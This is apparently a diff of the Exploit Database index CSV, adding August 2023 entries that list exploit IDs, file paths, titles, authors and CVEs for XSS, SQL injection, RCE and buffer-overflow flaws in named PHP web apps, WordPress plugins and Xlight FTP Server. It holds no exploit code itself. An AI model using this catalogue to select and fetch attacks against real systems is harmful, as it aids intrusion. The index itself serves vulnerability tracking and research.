 47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80,2019-08-08,2019-08-08,0,CVE-2019-14346,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,,2019-11-08,2019-11-08,0,CVE-2019-14347,,,,,
 47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,,2020-01-28,2020-02-03,1,CVE-2020-7991,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
@@ -15258,6 +15263,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6594,exploits/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,webapps,php,,2008-09-26,2016-12-21,1,OSVDB-49892;CVE-2008-4366,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 6710,exploits/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,webapps,php,,2008-10-08,2016-12-26,1,OSVDB-51859;CVE-2008-6087;OSVDB-51857;CVE-2008-6086,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 12251,exploits/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,webapps,php,,2010-04-14,,1,,,,,,
+51656,exploits/php/webapps/51656.txt,"Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload",2023-08-04,"Rajdip Dey Sarkar",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-39115,,,,,
 30003,exploits/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34222,,,,,https://www.securityfocus.com/bid/23874/info
 30004,exploits/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34223,,,,,https://www.securityfocus.com/bid/23874/info
 29966,exploits/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-02,1,CVE-2006-5911;OSVDB-34187,,,,,https://www.securityfocus.com/bid/23874/info
@@ -20449,6 +20455,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8278,exploits/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,webapps,php,,2009-03-23,,1,OSVDB-52858;CVE-2009-2313,,,,,
 2836,exploits/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,webapps,php,,2006-11-22,,1,OSVDB-30674;CVE-2006-6149,,,,,
 48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,,2020-04-21,2020-04-21,0,,,,,,
+51647,exploits/php/webapps/51647.txt,"JLex GuestBook 1.6.4 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",webapps,php,,2007-11-05,2014-01-06,1,CVE-2007-5954;OSVDB-39867,,,,,https://www.securityfocus.com/bid/26331/info
 6669,exploits/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,webapps,php,,2008-10-03,2016-12-26,1,OSVDB-48805;CVE-2008-4522;OSVDB-48804,,,,,
 34806,exploits/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,webapps,php,,2009-07-09,2014-09-28,1,CVE-2009-2440;OSVDB-55725,,,,,https://www.securityfocus.com/bid/43697/info
@@ -20498,6 +20505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
+51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@@ -24303,7 +24311,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php,,2006-09-06,,1,OSVDB-30790;CVE-2006-4678;OSVDB-30789,,,,,
 26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4262;OSVDB-21751,,,,,https://www.securityfocus.com/bid/15857/info
 26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4263;OSVDB-21752,,,,,https://www.securityfocus.com/bid/15857/info
-51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
+51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-08-04,1,,,,,,
 19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,,2012-06-16,2012-06-17,1,OSVDB-82995;OSVDB-82994;OSVDB-82993;OSVDB-82992,,,,,https://www.vulnerability-lab.com/get_content.php?id=600
 15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
@@ -26986,15 +26994,21 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102246;OSVDB-102163;OSVDB-102147;CVE-2014-10010;CVE-2014-10001,,,,,
 49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,,2020-12-17,2021-02-15,0,CVE-2020-35416,,,,,
 30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102162;OSVDB-102146,,,,,
+51651,exploits/php/webapps/51651.txt,"PHPJabbers Cleaning Business 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4115,,,,,
 30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102161;OSVDB-102160;OSVDB-102145;CVE-2014-10015;CVE-2014-10014,,,,,
 30954,exploits/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102223;OSVDB-102222;OSVDB-102219,,,,,
 30910,exploits/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102157;OSVDB-102148,,,,,
+51650,exploits/php/webapps/51650.txt,"PHPJabbers Night Club Booking 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4114,,,,,
 30950,exploits/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102241;OSVDB-102131,,,,,
 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info
 30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,,
+51653,exploits/php/webapps/51653.txt,"PHPJabbers Rental Property Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4117,,,,,
+51649,exploits/php/webapps/51649.txt,"PHPJabbers Service Booking Script 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4113,,,,,
+51648,exploits/php/webapps/51648.txt,"PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4112,,,,,
 50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,,
 51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
+51652,exploits/php/webapps/51652.txt,"PHPJabbers Taxi Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4116,,,,,
 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
@@ -32098,6 +32112,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
+51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
 35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info
 19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,,
@@ -32291,6 +32307,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33699,exploits/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",webapps,php,80,2014-06-09,2014-06-09,0,OSVDB-107773;OSVDB-107772;OSVDB-107771;OSVDB-107770;OSVDB-107769;OSVDB-107768;OSVDB-107767;OSVDB-107766;OSVDB-105981;OSVDB-105980;OSVDB-105979;OSVDB-105978;CVE-2014-4307;CVE-2014-4306,,,,,
 36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",webapps,php,,2015-04-26,2015-04-26,1,OSVDB-121619,,,http://www.exploit-db.com/screenshots/idlt37000/webui.png,,
 39707,exploits/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",webapps,php,80,2016-04-18,2016-04-20,1,,,,http://www.exploit-db.com/screenshots/idlt40000/captura-de-pantalla-de-2016-04-20-192255.png,http://www.exploit-db.comwebutler_v3.2.zip,
+51660,exploits/php/webapps/51660.txt,"Webutler v3.2 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,1,,,,,,
 31982,exploits/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,webapps,php,80,2014-02-28,2014-02-28,0,CVE-2013-6043;OSVDB-99204;CVE-2013-6042;CVE-2013-6041;OSVDB-99203;OSVDB-99202,,,,,
 45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebvet_2013_07_08.zip,
 9193,exploits/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,webapps,php,,2009-07-16,,1,,,,,,
@@ -32483,6 +32500,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
+51663,exploits/php/webapps/51663.txt,"WordPress adivaha Travel Plugin 2.3 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51655,exploits/php/webapps/51655.txt,"WordPress adivaha Travel Plugin 2.3 - SQL Injection",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php,,2009-07-09,2017-05-04,1,CVE-2009-2334;OSVDB-55712,,,,http://www.exploit-db.comWordPress-2.8.zip,http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
 23213,exploits/php/webapps/23213.txt,"WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php,,2003-10-03,2012-12-08,1,OSVDB-4609,,,,,https://www.securityfocus.com/bid/8756/info
 30520,exploits/php/webapps/30520.txt,"WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php,,2007-08-13,2013-12-27,1,CVE-2007-4482;OSVDB-37299,,,,,https://www.securityfocus.com/bid/25413/info
@@ -32896,6 +32915,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,,2019-09-02,2019-09-02,0,,,,,http://www.exploit-db.comevent-tickets.4.10.7.1.zip,
 17794,exploits/php/webapps/17794.txt,"WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",webapps,php,,2011-09-07,2011-09-07,1,OSVDB-86245,"WordPress Plugin",,,http://www.exploit-db.comeventify.zip,
 49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,,2020-12-01,2020-12-01,0,CVE-2020-29395,,,,,
+51658,exploits/php/webapps/51658.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-2796,,,,,
+51659,exploits/php/webapps/51659.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-3219,,,,,
 10929,exploits/php/webapps/10929.txt,"WordPress Plugin Events - SQL Injection",2010-01-02,Red-D3v1L,webapps,php,,2010-01-01,,1,OSVDB-61478,"WordPress Plugin",,,http://www.exploit-db.comevents-calendar.6.6.zip,
 43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,,2018-01-10,2018-01-10,0,CVE-2018-5315,,,,,
 44785,exploits/php/webapps/44785.txt,"WordPress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,,2018-05-28,2018-06-01,0,,,,,,
@@ -32949,6 +32970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,,2019-06-03,2019-06-03,0,CVE-2019-10866,,,,,
 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,,2020-05-25,2020-05-25,0,,,,,,
 30002,exploits/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",webapps,php,,2013-12-10,2013-12-10,1,CVE-2013-7187;OSVDB-100877,"WordPress Plugin",,,,
+51664,exploits/php/webapps/51664.txt,"WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution",2023-08-04,"Mehmet Kelepçe",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 17684,exploits/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php,,2011-08-18,2011-08-18,1,,"WordPress Plugin",,,http://www.exploit-db.comwpforum.1.7.8.zip,
 16235,exploits/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",webapps,php,,2011-02-24,2011-02-24,0,CVE-2011-1047;OSVDB-70994;OSVDB-70993,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpre
 17828,exploits/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",webapps,php,,2011-09-13,2011-09-13,1,OSVDB-75463;CVE-2012-6625,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,
@@ -33188,6 +33210,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39301,exploits/php/webapps/39301.html,"WordPress Plugin Ninja Forms 2.7.7 - Authentication Bypass",2014-09-08,Voxel@Night,webapps,php,,2014-09-08,2016-01-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/69740/info
 45234,exploits/php/webapps/45234.txt,"WordPress Plugin Ninja Forms 3.3.13 - CSV Injection",2018-08-21,"Mostafa Gharzi",webapps,php,,2018-08-21,2018-08-21,0,,,,,,
 45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80,2018-11-15,2018-11-20,0,CVE-2018-19287,"Cross-Site Scripting (XSS)",,,,
+51644,exploits/php/webapps/51644.py,"WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS",2023-08-04,"Mehran Seifalinia",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-37979,,,,,
 50455,exploits/php/webapps/50455.txt,"WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)",2021-10-25,"Akash Patil",webapps,php,,2021-10-25,2021-10-25,0,,,,,http://www.exploit-db.comninja-tables.4.1.7.zip,
 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php,,2015-06-05,2015-06-24,1,CVE-2012-3577;OSVDB-82792,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53790/info
 28485,exploits/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",webapps,php,,2013-09-23,2013-09-23,0,CVE-2013-5917;OSVDB-97528,"WordPress Plugin",,,http://www.exploit-db.comnospampti.zip,
@@ -39044,6 +39067,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36071,exploits/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,dos,windows,,2011-08-19,2015-02-14,1,,,,,,https://www.securityfocus.com/bid/49255/info
 43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows,,2017-11-13,2017-11-13,1,,,,http://www.exploit-db.com/screenshots/idlt43500/screen-shot-2017-11-13-at-194303.png,http://www.exploit-db.comsetup.exe,
 46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,,2019-02-25,2019-02-25,0,,,,,http://www.exploit-db.comsetup-x64.exe,
+51665,exploits/windows/dos/51665.py,"Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)",2023-08-04,"Yehia Elghaly",dos,windows,,2023-08-04,2023-08-04,0,,,,,,
 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515,2009-10-05,,1,OSVDB-58727,,,,,
 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21,2009-10-01,2011-04-27,1,,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,
 10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,dos,windows,21,2009-11-12,,1,CVE-2009-4108;CVE-2009-4048;OSVDB-60494,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,